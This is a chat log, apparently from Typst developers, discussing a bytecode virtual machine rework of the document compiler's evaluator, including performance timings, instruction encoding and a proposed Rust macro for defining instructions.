That was my actual question
basically, it allocates a Value::Args in a register and it pushed them into it one-by-one, so you can call with as many args as you want
When a function is called, it loads the arguments into registers on use
Oh I see
So you can have as many args as you want
Iβm just guessing the arguments are by pointer and that there typically just one Args item
indeed, it's just one Args passed by value
Or perhaps nothing.
indeed, if there are no args it doesn't bother to allocate anythign
So what do the other 31 registers do? Do you mark them as in use and just allocate deallocate them based on need?
basically, but in a function being called arguments are stored in their own special purpose registers
so you always have 32 registers
it's only when you're calling a function that it uses the Args data structure
Ok, methods are finally fixed afaik
Now all that's left are the scopes being a bit borked yet again
but I'll fix that next time I have time to work on it
I mean I did figure it out: (noting here for future me)
It cannot capture from the parent's parent's scope. This means that I need to create a bigger hierarchy of captures and be able to do recursive capturing, not particularly hard but I need to do it
Still the best solution π
Exciting times
Thanks β€οΈ
@sturdy sequoia we're waiting for the fix
no, it's the price you must pay for fast document compilations π
oh ok
i can understand that
you said continue in next weekend, probably.
I know but I can't stop
who cares that I have a technical interview later today π
Very charmπ₯
Fake it till you make it
BTW, removing the instruction deduplication almost halfed rust's compile time π
So it was definitely worth it
And I checked another bytecode VM and they do it the way I am now doing it so I'm not re-inventing the wheel
obsession i cannot sleep
you can't? why π¦
That's the plan, with my good friend ChatGPT π
No you can't, because you're obsessed
Oh no, I slept like a baby 
Could've slept some more tho
So now there is something wrong with conditions producing a boolean 
I figured it out
But now I really must prepare my interview π
Next issue: some captures don't work for reasons unknown π
the guy is UNSTIPPABLE
UNTYPSTABLE
π π π π π π π π π π π
Can't even pandoc Dherse -o Dherse.typ :(
π
Ok, so, it can compiler: the preface and the introduction
getting there!
Chapter 1 compiles too π
Now tablex doesn't compile π
@glad urchin see what you're doing to me!
i mean, did it compile in the first place? lol
Ok, it's improving
It almost compiles the thesis now
it fails many iterations in
I think my code just found a bug in queries
π§
@tight glade @sly pecan @glad urchin @left night @feral imp I can now confirm that the new evaluation system is significantly faster, I don't know yet exactly how much faster (I need to do more testing) but at least 3x faster even when taking into account the extra compilation that needs to be performed before eval π
π
And I think that with borrowing and a few other optimizations it might be even faster π
How big a part of compilation is eval though?
I assume compilation as a whole isn't 3x faster
In this case I am trying on an eval heavy document while I keep fixing bugs
π
Ok, so using the handy-dandy --timings arguments:
- Before rework: 5.7s of which 1.2s is layout => eval is 4.5s
- After rework: 2.33s of which 1.2s is layout => eval is 1.13s
Meaning a speedup of almost 4x in eval
is that your thesis?
These are obviously very rough numbers because compilation is cached across invokations
No, it's a second document I'm using for testing
My thesis still doesn't compile, but I don't know what the bug is... YET!
@left night I do think I will end up rewriting it as an array of structs because currently I am quite limited in doing things like "either a register, a constant, a local, or an arg" which leads to way more instructions than needed
Instead I could just have a system like OpCode(Flags) being 16 bits where the Opcode is 8 bits and the flags are 8 bits indicating how the arguments work
I think that could lead to much faster execution and less instructions overall
does eval heavy mean you actually have to use eval in typst? like mitex does?
no, it means it runs a lot of typst code
like you would see using cetz or tablex, or anything that does data processing in general
ah okay
I think you meant "structure of arrays" here, maybe? π€
oh yes sorry
I'm tired
is there a reason for it though other than some instructions possibly being longer than they should be?
It saves memory since there is no wasted space
It saves cache utilization (for the same reason)
It can be faster
well, it can, but you will need to measure it
It can save tons of instructions by giving me more freedom in how I am "crafting" the instructions by being able to have more than one value
indeed
the problem with SoA is that it's harder to support, and here I don't see much reason to use it
instructions are executed in sequential order anyway, so you will get good cache occupancy thanks to prefetching either way
If I go the SoA route, I'll write a proc-macro to generate the instruction and builders for them, that way it's not too error-prone
even if instructions are like 32 bytes long
That's true, but I would ideally like to keep them as short as possible to get the most cache occupancy possible
well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for sure
Well that's platform dependent :-p
thing is, SoA is usually implemented if you can take the advantage of parallelism, because you will be able to work with multiple objects anyway thanks to SIMD
and here it is not the case
well
unless you are going to implement some kind of SIMD instruction parsing...
no lol
which would be kind of cool but also too cool
lmao
anyway, you can try, it would be interesting to see the difference for sure
how are constants stored? is it like a global (for every function/block of code/something) array which you can index within some instructions?
it's module-local or function-local (depending if you're in a module or a function, function always have their own copies of everything)
ok, makes sense... I was going to say that if you want to improve code cache occupancy it might be worth considering improving cache occupancy of something else instead (making layout of everything more predictable will make predictable layout of code even more predictable), but I suppose it's not as simple as it may seemπ€
anyway, do your thing and try to compensate for carbon emissions of your compilations, I suppose π
What I want is mostly to get a first draft that works, and then try different improvements mostly
nice
omg
it did not, queries found a bug in my code π
@sturdy sequoia fun memories. this was the "first" content rework, which moved from an enum to something pretty close to what we have now (but obviously with way less features). the dynamic Attr thing only came later. this goes to show how far-reaching a single bad design decision is.
Actually with hindsight I think it made a lot of sense, especially when you consider that you didn't have the proc-macro at the time
What's the bad design decision here?
moving to dyn structs
the old Content sytem with a EcoVec<Attr> to store fields
Hmmm π€
Speculative execution
cold compilation? What about incrementally?
I can't say just yet, I'll try once I have a larger doc!
But eval speed seems to be really improved
incrementally it should be even higher π€
I'm still having somes issues in tablex and running tests is actually surprisingly hard (because spans don't match for... reasons)
Have you already applied comemo, or this is a result of executing bytecode without caching.
yes, there is already memoization for closure calls and module loading
but there is no caching dedicated to compilation (yet)
You have been announced 2x, 3x, 4x performance improvement again and again. There should be at one another 
Well it's been very gradual π
Small gains x infinity = big gains π
I think it's quite nice because I have also made bytecode compilmation part of the timings
proof that tablex is great to extensively test eval
π
yes π
Q: is bytecode compilation memoized as well?
no
but eventually it will be of course
i see
The thesis and, the table package.
I also added module eval as a thing, I just need to add closure compilation
cuz i often see some talks about the idea of using a JIT but I think that's going perhaps way too far
some (comparatively) simple bytecode memoization could perhaps be more suitable
if that makes sense
I generally agree, I think the gains we'll have here will already be awesome
Is bytecode serializable? I think we can have a /target directory like rust storing black hole of bytecode now. π
it would be trivially serializable π
53 GiB typst-target folder
it's just a BUNCH of u16s
Really depends how long it takes to compile to bytecode
fair
Like compiling most of the bytecode in my thesis takes around 20ms
and my thesis is long and includes tablex π
and I think that parsing and compilation could be deferred to multiple threads π
just use 0.10.0
happy to help π
im gonna make a patch for typst 0.[version with bytecode].0 which just replaces all Compile implementations with a mock
that should help
And also we can say that result of evaluation are safe to cached in disk? We were imagining a persistent comemo cache, but something like pointers prevent it.
from what I saw, yes
Well you could cache them but that would require serializing (which is slow)
but for bytecode then it's trivial because there are no pointers
everything is done with IDs into shared arrays
like ConstId for constants, StringID, etc.
Some of them, I refer to at least @onyx furnace's a large set of plugin calls in his 2500 pages document, are valuable to persist.
true, but in the case of @onyx furnace's doc, I think moving to wasmtime would already be a huge improvement
I have tested it and it like halved the compilation time
maybe there could be a way of timing calls to check how long they each take and only keeping those that ran very long
(doesn't have to be time specifically, could also just be counting number of instructions executed)
the problem isn't that the individual calls are slow, is that there are so goddamn many of them π
That's why I've been thinking of "deferred" calls, where the value is only known when it's needed
But of course that would require plugins to be Send + Sync
Anyway, I'm off to bed β€οΈ
that sounds like a good idea for me as well
I think we will get furthermore improvement. But you are right it is other ways to improve and already fast enough even without persisting cache.
Another day on #1176509648707256370.
will this make it faster? i think this is not parallize-able.
yes. in that case, time is used in plugin calls
the flamegraph looks amazing
may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc should be "eval-heavy" ones?
It's more that we could parse all of the files in your project all at once
yes I am soooooo happy about the --timings feature and how it came out. Thank you very very much to you and @untold turret for the idea of making it compatible with chrome traces! It's awesome π
only if import/include is required to have static paths or if we do it optimistically for those that are static
but overall yes
Yes of course, I am using several ones, but my "workhorse" for this work is a mandelbrot. My thesis doesn't compile yet, I am slowly working through the automated tests to figure out what is wrong π
but we potentially also eval shared leafs twice unnecessarily
In the end what I find funny is that parsing takes significantly longer than compilation which I was not expecting π
and parsing we can notably not do completely in parallel
since we obviously need to find those imports
true true, but perhaps the parser could automatically add "static" imports to a big list of files that are "in the path" so-to-speak for parsing and compiling in a deferred way?
It's no big deal either way, it doesn't account for very much anyway
But I think it's a "low hanging fruit" for making eval faster
slightly faster *
@left night BTW I hope you don't mind that I am looking into eval but I like these "bigger" projects, I find them really rewarding to work on and with all of the reworks you're doing in other parts of the codebase I didn't want to cause trouble there so I figured eval was a good place to work on to cause as little friction as possible on your own work
It also has really motivated me to work on Typst again β€οΈ
Really sorry for being a bit harsh with the revoke thing the other day π
Don't worry about it, it's already forgotten
It's very cool that you're taking this bytecode thing on
mandelbrot is definitely very scripting-heavy! nice for this taskπ
indeed π
I wanted something that would really test eval more than anything else
@left night are destructure patterns in for loop supposed to be defined within the parent's scope? like this:
for i in range(10) { ... }
// Is `i` valid here?
i
or should i remain scoped to the loop?
I think it should be the later but I'm curious what you think
Former is how it is done in R, so.... I don't think so.
Aren't you supposed to like R? π
Off-topic.

It should remain scoped to the loop (that's also how it works on main from a quick test).
yes, I figured it's just a bit ugly with the way my compiler currently works
I'll fix that π
There may be some specification interpreter for typst, which never launch too many optimization. And the answer is its result.
@left night what do you think of a macro like this for creating instructions:
isr! {
Add -> Register | Local {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
} => |add| {
std::ops::add(add.lhs(), add.rhs())
}
#[scope]
Iter {
value: Register | Constant | Local | Global | Param | Capture,
target: Iterator,
}
#[flow]
And {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
target: Jump,
} => |and, cf| {
let lhs = and.lhs().cast::<bool>()?;
if !lhs {
cf.jump(and.target())
Value::None
} else {
let rhs = and.rhs().cast::<bool>()?;
Value::Bool(lhs && rhs)
}
}
#[flow]
If {
condition: Register | Constant | Local | Global | Param | Capture,
then: Jump,
else: Jump | None,
} => |if, cf| {
if if.condition().cast::<bool>()? {
cf.jump(if.then())
} else {
cf.jump(if.else())
}
}
#[flow]
#[scope(consume)]
Label {
label: Jump,
pop: bool,
} => |label| {
if label.pop() {
label.scope().pop()
}
}
#[flow]
Next -> Register | Local {
iter: Iterator,
bottom: Jump,
} => |next, cf| {
if let Some(value) = next.iter().next() {
value
} else {
cf.jump(next.bottom())
Value::None
}
}
#[flow]
Jump {
target: Jump,
} => |jump, cf| {
cf.jump(jump.target())
}
#[flow]
Break {
target: Jump,
} => |break, cf| {
// We want to go into breaking mode.
cf.break(break.target())
}
}
(obviously mockup code)
Does that also define the instructions as types, or only implement traits?
it would create a bunch of things actually
all of the opcodes (as a repr(u8) enum), all of the bitflags for the different types that each argument can take, etc.
and builder structs for every single instruction to make creation nicer
I have no idea what it means at all π¬π
What does -> means
defines the output of the instruction
so Add produces either a Register or a Local
and then when the closure is called, it would produce a Value that would automatically be stored in the right place
Hmmm maybe i just don't have enough context to understand
But typically what is the right place
It depends, it will either be stored in a register or stored in a local
my idea is that it can be done with the one instruction
But don't we need to know which register or local?
exactly
that's the annoying part right now
with this it could be made much easier
I would also write it in a binary format with dynamic length instructions
I remain confused as to what happens precisely as a consequence of this macro invocation
I can only work with what i imagine is needed for your vm so I'd suggest choosing one of the simplest instructions and writing the non pseudo code version of the macro
It would produce:
Wouldn't dynamic length instructions complicate jumping z lot?
Wouldn't it be better to create the enum separately and have a macro to implement all of the auxiliary things?
- A builder for each instruction
- The
Instructionenum - The
Compilerstruct - The
Executorstruct - An accessor for each instruction
- The
evalmethod on the executor
Maybe even a derive macro
I want a single macro doing everything, specifically handling the dynamic length instructions
Yeah well i don't
π
lol jk
But I mean I just think it's weird to generate the types as well, idk
Unless it would be really hard to generate the types by hand
Somehow
Nice! It does all the job π
Then to implement eval or bytecode for something you'd just return a list of instructions?
Well i see an interest in grouping all that logic, would the macro be comprehensible by mere mortals? π
the macro would definitely be a mess π
ππ
but it would make reading the VM code much much easier
Like how do you plan to handle dynamic length instructions?
based on each opcode it would know how many bytes to read
Sounds like you maybe need zero abstraction types to handle that complexity and then combine these lower levels brick to build an system in which you can express the vm
it would look like:
| 8-bit | 8-bit | 16-bit | 8-bit | 16-bit | 8-bit | 16-bit |
|--------|--------|----------------|--------|----------------|--------|----------------|
| OpCode | Flag | Arg0 | Flag | Arg1 | Flag | Dest |
The flag would tell it what the argument is, so if it's a register, a const id, a local id, etc.
yes that's what I would do
That should reduce the need for a macro then right?
Not really, because creating all of the builders etc. would be a giant chore
Maybe simpler macros here can help? π π
Seems like we're moving the complexity around π
I mean I could do one macro per instruction and then a big macro that takes all of the other ones in
π€·ββοΈ
like:
instruction! {
struct Add -> Register | Local {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
}
}
That's like the same thing to be honest π
Then I can do something like:
impl Exec for Add<'_> {
fn exec(self, cf: &mut ControlFlow) -> StrResult<...> {
ops::add(self.lhs(), self.rhs()
}
}
I think you can still use macros, i just think you don't need to make everything a macro
Oh!
E.g. this could be a derive macro
It would be much more readable too
That does sound nice
no, because I can't do custom syntax for the multiple input types and I can't easily specify the output type
Huh?
I need to specify the multiple different types that an input can take
additionally, I also need to specify its output type
a derive macro cannot do that
an attribute macro could
Where would this be used? In the field types?
